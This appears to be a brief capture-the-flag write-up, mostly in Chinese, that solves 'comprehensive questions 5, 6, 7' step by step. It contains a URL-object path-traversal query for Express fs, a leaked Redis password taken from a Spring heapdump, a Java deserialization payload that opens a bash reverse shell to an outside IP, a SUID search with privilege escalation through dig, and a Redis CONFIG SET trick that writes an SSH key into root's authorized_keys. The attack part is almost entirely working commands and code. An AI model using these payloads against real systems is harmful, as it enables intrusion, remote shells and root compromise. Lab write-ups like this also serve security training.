express fs

?file[href]=a&file[origin]=1&file[protocol]=file:&file[hostname]=&file[pathname]=/home/node/fl%2561g.txt

综合题5、6、7

spring heapdump泄露信息

sun.java.command = /app/demo.jar --spring.config.location=/usr/local/share/application.properties

application.properties有redis信息的泄露

server.port=18080
server.servlet.context-path=/
management.endpoints.web.exposure.include=heapdump
spring.redis.host=172.25.0.10
spring.redis.port=62341
spring.redis.password=de17cb1cfa1a8e8011f027b416775c6a
spring.servlet.multipart.max-file-size=10MB

读取jar包

发现flag1

from base64 import b64decode
O0O = b"6925cc02789c1d2552b71acc4a2d48fd"
encFlag = "UFVTUhgqY3d0FQxRVFcHBlQLVwdSVlZRVlJWBwxeVgAHWgsBWgUAAQEJRA=="
raw=b64decode(encFlag)
l=32
for i in range(43):
    c=raw[i]
    o=i%(32)
    b=O0O[o]
    r=chr(c^b)
    print(r,end="")

获得flag1

反序列化漏洞

        Ping p =new Ping();
        p.setCommand("bash");
        p.setArg1("-c");
        p.setArg2("bash -i >& /dev/tcp/39.101.70.33/2345 0>&1");
        ByteArrayOutputStream bos=new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(p);
        String res=Base64.getEncoder().encodeToString(bos.toByteArray());
        System.out.println(res);

反弹shell，发现app/Upload/hint.txt flag2在/root/flag2

find / -perm -u=s -type f 2>/dev/null

dig -f /root/flag2

frp开代理
redis写ssh公钥

cd ~/.ssh
ssh-keygen
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > temp.txt
cat temp.txt|redis-cli -h 172.25.0.10 -p 62341 -a de17cb1cfa1a8e8011f027b416775c6a -x set key
redis-cli -h 172.25.0.10 -p 62341 -a de17cb1cfa1a8e8011f027b416775c6a
>CONFIG SET dir /root/.ssh
>CONFIG SET dbfilename authorized_keys
>save
ssh -i id_rsa [email protected]

拿到flag3